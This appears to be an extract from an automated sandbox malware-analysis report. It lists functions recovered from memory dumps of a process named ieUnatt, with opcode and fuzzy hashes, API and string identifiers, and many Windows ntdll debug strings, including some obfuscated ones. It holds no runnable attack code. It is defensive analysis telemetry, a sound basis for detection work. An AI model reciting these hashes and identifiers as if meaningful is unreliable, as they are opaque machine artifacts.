                                                                      Function 050B2C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.4085401683.0000000005040000.00000040.00001000.00020000.00000000.sdmp, Offset: 05040000, based on PE: true
                                                                      • Associated: 00000008.00000002.4085401683.0000000005169000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.4085401683.000000000516D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.4085401683.00000000051DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_5040000_ieUnatt.jbxd
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: 56542802fa55500e9026d260b3f5a53985ca48efe80d89543960f8535db5fecd
                                                                      • Instruction ID: 81f44c9c0e98238f6ed62a223a9b7c4486a90670672bbb54fc7e4cff22580e9a
                                                                      • Opcode Fuzzy Hash: 56542802fa55500e9026d260b3f5a53985ca48efe80d89543960f8535db5fecd
                                                                      • Instruction Fuzzy Hash: 97B02B328014C1C5FA00E3205608B1F3E007BC0301F15C061D2030241F0338C0D0E175

                                                                      Non-executed Functions

                                                                      Function 053904E8 Relevance: .1, Instructions: 146COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.4087025874.0000000005390000.00000040.00000800.00020000.00000000.sdmp, Offset: 05390000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_5390000_ieUnatt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: d386bb627630dbe32cc7d41eefeeae4b7758c1892456d2af03914b291bdce285
                                                                      • Instruction ID: 20a0b8559007c1480d5b4e55b1c0f4776d1000d34a94ab838f5957ab73764029
                                                                      • Opcode Fuzzy Hash: d386bb627630dbe32cc7d41eefeeae4b7758c1892456d2af03914b291bdce285
                                                                      • Instruction Fuzzy Hash: 4F41F8B161CB4D8FDB6CEF6D9085676B3E2FB85300F50062DD98AC3252EB74E8468785
                                                                      Function 0539DFCA Relevance: 57.7, Strings: 46, Instructions: 213COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.4087025874.0000000005390000.00000040.00000800.00020000.00000000.sdmp, Offset: 05390000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_5390000_ieUnatt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: !"#$$%&'($)*+,$-./0$123@$4567$89:;$<=@@$?$@$@@@?$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@
                                                                      • API String ID: 0-3754132690
                                                                      • Opcode ID: d0d2da888bc9bfe4dd4fd066b230f549b696502cb478700a218cebe9bdc33d47
                                                                      • Instruction ID: 49083cfe86349896f7d9abb62e5d199aee468a0f54c2c36f00b77421f57867ba
                                                                      • Opcode Fuzzy Hash: d0d2da888bc9bfe4dd4fd066b230f549b696502cb478700a218cebe9bdc33d47
                                                                      • Instruction Fuzzy Hash: C1914EF04082948ACB158F54A0652AFFFB5EBC6305F15816DE7E6BB243C3BE89059B85
                                                                      Function 05393C7D Relevance: 20.1, Strings: 16, Instructions: 64COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.4087025874.0000000005390000.00000040.00000800.00020000.00000000.sdmp, Offset: 05390000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_5390000_ieUnatt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: "1*l$&lrr$',40$',40$*(&c$+1,.$,jc$//"l$c&-n$msmu$qsck$tqmq$umrx$vmsc$vpwm$vpwm
                                                                      • API String ID: 0-3311200144
                                                                      • Opcode ID: 0217cd2b48621ced41b2a264c866e23ac6367ed3c145a72057eedb05b82bda78
                                                                      • Instruction ID: 0d27e2313c6a859e1d4a6bcf12d789a2e26091cafac8a1f722f032f2e0d0de4b
                                                                      • Opcode Fuzzy Hash: 0217cd2b48621ced41b2a264c866e23ac6367ed3c145a72057eedb05b82bda78
                                                                      • Instruction Fuzzy Hash: EF3142B084474DDBCF24DF84DA827DDBB71FB01354F80A259E8096F254DBB68A54CB8A
                                                                      Function 050B2890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.4085401683.0000000005040000.00000040.00001000.00020000.00000000.sdmp, Offset: 05040000, based on PE: true
                                                                      • Associated: 00000008.00000002.4085401683.0000000005169000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.4085401683.000000000516D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.4085401683.00000000051DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_5040000_ieUnatt.jbxd
                                                                      Similarity
                                                                      • API ID: ___swprintf_l
                                                                      • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                      • API String ID: 48624451-2108815105
                                                                      • Opcode ID: 62389f5959ea354275e2eb72f7f2789d847c4b2bd84c6cf4f40bd79c8c337f16
                                                                      • Instruction ID: d6794e2800b28c4d647d093f1bb06b966e3e82cfb08037d6384ca9ecc37bf2fe
                                                                      • Opcode Fuzzy Hash: 62389f5959ea354275e2eb72f7f2789d847c4b2bd84c6cf4f40bd79c8c337f16
                                                                      • Instruction Fuzzy Hash: 1651E8B6B04117BFDB20DF98A8D49BEF7F9BB09200B508169E469D7641D274DE408BE0
                                                                      Function 05122410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.4085401683.0000000005040000.00000040.00001000.00020000.00000000.sdmp, Offset: 05040000, based on PE: true
                                                                      • Associated: 00000008.00000002.4085401683.0000000005169000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.4085401683.000000000516D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.4085401683.00000000051DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_5040000_ieUnatt.jbxd
                                                                      Similarity
                                                                      • API ID: ___swprintf_l
                                                                      • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                      • API String ID: 48624451-2108815105
                                                                      • Opcode ID: c6125ab6b631d61d7facf7c9e384ed3088625296f1a4dbd5463b96e6466608f9
                                                                      • Instruction ID: b5c665375b8bc738860d63d8ad6f8adeda9962b722195c0a202945d92d5289c8
                                                                      • Opcode Fuzzy Hash: c6125ab6b631d61d7facf7c9e384ed3088625296f1a4dbd5463b96e6466608f9
                                                                      • Instruction Fuzzy Hash: 5C51E579A04665AFCB34DF9CC8909BFB7BAEF44200B44885DE4A6C7641E7B4DA50C760
                                                                      Function 050A7630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      • Execute=1, xrefs: 050E4713
                                                                      • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 050E4742
                                                                      • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 050E46FC
                                                                      • ExecuteOptions, xrefs: 050E46A0
                                                                      • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 050E4725
                                                                      • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 050E4655
                                                                      • CLIENT(ntdll): Processing section info %ws..., xrefs: 050E4787
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.4085401683.0000000005040000.00000040.00001000.00020000.00000000.sdmp, Offset: 05040000, based on PE: true
                                                                      • Associated: 00000008.00000002.4085401683.0000000005169000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.4085401683.000000000516D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.4085401683.00000000051DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_5040000_ieUnatt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                      • API String ID: 0-484625025
                                                                      • Opcode ID: 797f2ef650d0e08c12a941bc02a38e05e0cf8739a6f548153b9538d906f61ebf
                                                                      • Instruction ID: d2a97a490224e91980678ed10ad1acc1803423af7b338357fb86db1dcee0e4f1
                                                                      • Opcode Fuzzy Hash: 797f2ef650d0e08c12a941bc02a38e05e0cf8739a6f548153b9538d906f61ebf
                                                                      • Instruction Fuzzy Hash: 8F51F4327002197AEF21EBA4FD89FFE77A9FB54310F1440A9E505AB190EBB19E41CB50
                                                                      Function 050BB5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.4085401683.0000000005040000.00000040.00001000.00020000.00000000.sdmp, Offset: 05040000, based on PE: true
                                                                      • Associated: 00000008.00000002.4085401683.0000000005169000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.4085401683.000000000516D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.4085401683.00000000051DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_5040000_ieUnatt.jbxd
                                                                      Similarity
                                                                      • API ID: __aulldvrm
                                                                      • String ID: +$-$0$0
                                                                      • API String ID: 1302938615-699404926
                                                                      • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                      • Instruction ID: fc027ced19bb255839571718d76076a344291f044647391935639f70791e8045
                                                                      • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                      • Instruction Fuzzy Hash: 5381B070E492499FFF24CE68E9D1BFEBBE2BF45310F18411AD892A7290C7B48941CB54
                                                                      Function 051220E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.4085401683.0000000005040000.00000040.00001000.00020000.00000000.sdmp, Offset: 05040000, based on PE: true
                                                                      • Associated: 00000008.00000002.4085401683.0000000005169000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.4085401683.000000000516D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.4085401683.00000000051DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_5040000_ieUnatt.jbxd
                                                                      Similarity
                                                                      • API ID: ___swprintf_l
                                                                      • String ID: %%%u$[$]:%u
                                                                      • API String ID: 48624451-2819853543
                                                                      • Opcode ID: 52b0e08e0275dd8d3b88b8e6077030b92dd467c86ffe52d6aad59005c7ce89c5
                                                                      • Instruction ID: 6a6a2c24c7e14ae2b03d12a46a5287b72b4aef3bb25cd4921060c760a49ba5c3
                                                                      • Opcode Fuzzy Hash: 52b0e08e0275dd8d3b88b8e6077030b92dd467c86ffe52d6aad59005c7ce89c5
                                                                      • Instruction Fuzzy Hash: 3121627AE00129ABDB10DF79DD54EFEBBF9EF54640F040126E915E7200EB70DA118BA1
                                                                      Function 0509F5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 050E02BD
                                                                      • RTL: Re-Waiting, xrefs: 050E031E
                                                                      • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 050E02E7
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.4085401683.0000000005040000.00000040.00001000.00020000.00000000.sdmp, Offset: 05040000, based on PE: true
                                                                      • Associated: 00000008.00000002.4085401683.0000000005169000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.4085401683.000000000516D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.4085401683.00000000051DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_5040000_ieUnatt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                      • API String ID: 0-2474120054
                                                                      • Opcode ID: 093999d57422e606c69b036e78d683e8aacdb849885832cd8c0fbe6ad01e2339
                                                                      • Instruction ID: 585b4c8273f616229f4f8665bb0b8b9544b31d39a070b23e992a04908695ce9f
                                                                      • Opcode Fuzzy Hash: 093999d57422e606c69b036e78d683e8aacdb849885832cd8c0fbe6ad01e2339
                                                                      • Instruction Fuzzy Hash: DCE1A0306087429FDB69CF28E998B6EB7E1BB84314F240A5DF5A5CB2D1D7B4D844CB42
                                                                      Function 050ABED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      • RTL: Re-Waiting, xrefs: 050E7BAC
                                                                      • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 050E7B7F
                                                                      • RTL: Resource at %p, xrefs: 050E7B8E
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.4085401683.0000000005040000.00000040.00001000.00020000.00000000.sdmp, Offset: 05040000, based on PE: true
                                                                      • Associated: 00000008.00000002.4085401683.0000000005169000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.4085401683.000000000516D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.4085401683.00000000051DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_5040000_ieUnatt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                      • API String ID: 0-871070163
                                                                      • Opcode ID: d2ce7f815aa8a64eef77c43b6a4afb77c664d8558f351bbc9d18b01abd42ab72
                                                                      • Instruction ID: 97360919cbb627aea1378b7e06e770a02eb86c9576032acf5377ddf5693a9376
                                                                      • Opcode Fuzzy Hash: d2ce7f815aa8a64eef77c43b6a4afb77c664d8558f351bbc9d18b01abd42ab72
                                                                      • Instruction Fuzzy Hash: 5B41E2363047429FC720DE29E841B6EB7E6FF88720F140A1DE95A9B681DB71E8058B91
                                                                      Function 050AB4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 050E728C
                                                                      Strings
                                                                      • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 050E7294
                                                                      • RTL: Re-Waiting, xrefs: 050E72C1
                                                                      • RTL: Resource at %p, xrefs: 050E72A3
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.4085401683.0000000005040000.00000040.00001000.00020000.00000000.sdmp, Offset: 05040000, based on PE: true
                                                                      • Associated: 00000008.00000002.4085401683.0000000005169000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.4085401683.000000000516D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.4085401683.00000000051DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_5040000_ieUnatt.jbxd
                                                                      Similarity
                                                                      • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                      • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                      • API String ID: 885266447-605551621
                                                                      • Opcode ID: d4e51b334e41df821c160cdaf3dd6162f7aa520cada5442e4ef05e45b8a5e93b
                                                                      • Instruction ID: ac1dc3dfbbe29716bcf31d25700f28e135c6a1f594ca353be45a3ab5a7ffe812
                                                                      • Opcode Fuzzy Hash: d4e51b334e41df821c160cdaf3dd6162f7aa520cada5442e4ef05e45b8a5e93b
                                                                      • Instruction Fuzzy Hash: BC41DD32704242AFD721DE64EC41FAEB7E6FF94710F240619FD56AB240DB21E8029BD1
                                                                      Function 05122300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.4085401683.0000000005040000.00000040.00001000.00020000.00000000.sdmp, Offset: 05040000, based on PE: true
                                                                      • Associated: 00000008.00000002.4085401683.0000000005169000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.4085401683.000000000516D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.4085401683.00000000051DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_5040000_ieUnatt.jbxd
                                                                      Similarity
                                                                      • API ID: ___swprintf_l
                                                                      • String ID: %%%u$]:%u
                                                                      • API String ID: 48624451-3050659472
                                                                      • Opcode ID: 22faf3414172cc226c8be902b2a98a2cef65314771501df62f178c32906ec09f
                                                                      • Instruction ID: af63f2ff1f292046b7db09f86cb8b02980d0eab2f5f32a7a006b75acc1d096a1
                                                                      • Opcode Fuzzy Hash: 22faf3414172cc226c8be902b2a98a2cef65314771501df62f178c32906ec09f
                                                                      • Instruction Fuzzy Hash: EC316676A002299FDB60DF29DC54FFEB7F8FF48610F444555E859E3240EB30AA549BA0
                                                                      Function 050B7D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.4085401683.0000000005040000.00000040.00001000.00020000.00000000.sdmp, Offset: 05040000, based on PE: true
                                                                      • Associated: 00000008.00000002.4085401683.0000000005169000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.4085401683.000000000516D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.4085401683.00000000051DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_5040000_ieUnatt.jbxd
                                                                      Similarity
                                                                      • API ID: __aulldvrm
                                                                      • String ID: +$-
                                                                      • API String ID: 1302938615-2137968064
                                                                      • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                      • Instruction ID: b51254816830ab7a50109bbc7195ff29ea5d47d2772674cd9f792445cdef57d1
                                                                      • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                      • Instruction Fuzzy Hash: 2991B170E0420A9AFF64DE69E8C2AFEB7F6FF84360F14451AE865E72D0D7B089418714
                                                                      Function 05079126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.4085401683.0000000005040000.00000040.00001000.00020000.00000000.sdmp, Offset: 05040000, based on PE: true
                                                                      • Associated: 00000008.00000002.4085401683.0000000005169000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.4085401683.000000000516D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.4085401683.00000000051DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_5040000_ieUnatt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: $$@
                                                                      • API String ID: 0-1194432280
                                                                      • Opcode ID: 4991b19426dc234e82d1fd0bcc907264484902ef7037d65c354808b2b52a62d3
                                                                      • Instruction ID: 2091e35b49230a3a3313d8f2fed4f82fe33d8006a77040c0121a738478decc1c
                                                                      • Opcode Fuzzy Hash: 4991b19426dc234e82d1fd0bcc907264484902ef7037d65c354808b2b52a62d3
                                                                      • Instruction Fuzzy Hash: EF814A75E002699BDB31DB54DC45BEEB7B4AF08750F0445EAE91AB7280E7319E80CFA4
                                                                      Function 050FCEA0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 134COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • @_EH4_CallFilterFunc@8.LIBCMT ref: 050FCFBD
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.4085401683.0000000005040000.00000040.00001000.00020000.00000000.sdmp, Offset: 05040000, based on PE: true
                                                                      • Associated: 00000008.00000002.4085401683.0000000005169000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.4085401683.000000000516D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.4085401683.00000000051DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_5040000_ieUnatt.jbxd
                                                                      Similarity
                                                                      • API ID: CallFilterFunc@8
                                                                      • String ID: @$@4Cw@4Cw
                                                                      • API String ID: 4062629308-3101775584
                                                                      • Opcode ID: 3042e9e6c059d37503740be74e75b6b12bb4630c4c345e1a67b32155ac91ab92
                                                                      • Instruction ID: f42fe3e8e86d086ce452a8565ab4b69887d14a1115f690b5104baf49c34e8740
                                                                      • Opcode Fuzzy Hash: 3042e9e6c059d37503740be74e75b6b12bb4630c4c345e1a67b32155ac91ab92
                                                                      • Instruction Fuzzy Hash: 1041AD72A00218EFDB21EFA4E841AAEFBF8FF54B00F04442AEA15DB650D7748841DB61